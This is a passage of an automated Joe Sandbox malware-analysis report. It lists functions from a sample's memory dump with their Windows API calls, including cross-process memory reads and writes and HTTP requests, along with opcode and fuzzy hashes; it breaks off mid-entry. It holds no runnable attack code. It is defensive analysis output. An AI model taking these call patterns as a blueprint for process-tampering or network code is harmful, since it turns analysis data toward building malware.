                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 1042038666-0
                                                                              • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                              • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                              • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                              • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                              Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                              • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                              • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                              • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                              Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                              • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                              • ExitThread.KERNEL32 ref: 0041410F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                              • __freefls@4.LIBCMT ref: 00414135
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                              • String ID:
                                                                              • API String ID: 132634196-0
                                                                              • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                              • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                              • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                              • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                              Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                              • __getptd_noexit.LIBCMT ref: 00415620
                                                                              • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                              • __freeptd.LIBCMT ref: 0041563B
                                                                              • ExitThread.KERNEL32 ref: 00415643
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 3798957060-0
                                                                              • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                              • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                              • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                              • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                              Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                              • ExitThread.KERNEL32 ref: 004156BD
                                                                              • __freefls@4.LIBCMT ref: 004156D9
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                              • String ID:
                                                                              • API String ID: 1537469427-0
                                                                              • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                              • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                              • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                              • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                              Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _malloc
                                                                              • String ID: Default$|k
                                                                              • API String ID: 1579825452-2254895183
                                                                              • Opcode ID: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
                                                                              • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                              • Opcode Fuzzy Hash: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
                                                                              • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                              Function 0044F0B1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _memcmp
                                                                              • String ID: '$[$h
                                                                              • API String ID: 2931989736-1224472061
                                                                              • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                              • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                              • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                              • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                              Function 0044F1F5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: >$R$U
                                                                              • API String ID: 909875538-1924298640
                                                                              • Opcode ID: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                                              • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                              • Opcode Fuzzy Hash: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                                              • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                              Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                              • CoUninitialize.OLE32 ref: 0046CE50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk
                                                                              • API String ID: 886957087-24824748
                                                                              • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                              • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                              • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                              • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                              Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 176396367-557222456
                                                                              • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                              • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                              • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                              • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                              Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                              • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCopyInit_malloc
                                                                              • String ID: 4RH
                                                                              • API String ID: 2981388473-749298218
                                                                              • Opcode ID: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                              • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                              • Opcode Fuzzy Hash: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                              • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                              Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • __wcsnicmp.LIBCMT ref: 0046681A
                                                                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                              • String ID: LPT$HH
                                                                              • API String ID: 3035604524-2728063697
                                                                              • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                              • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                              • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                              • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                              Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                              • String ID: @
                                                                              • API String ID: 4055202900-2766056989
                                                                              • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                              • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                              • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                              • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                              Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset_wcslen
                                                                              • String ID: |
                                                                              • API String ID: 915713708-2343686810
                                                                              • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                              • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                              • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                              • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                              Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                              • HttpQueryInfoW.WININET ref: 0044A892
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 3705125965-3916222277
                                                                              • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                              • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                              • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                              • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                              Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                              Download Yara Rule
                                                                              APIs
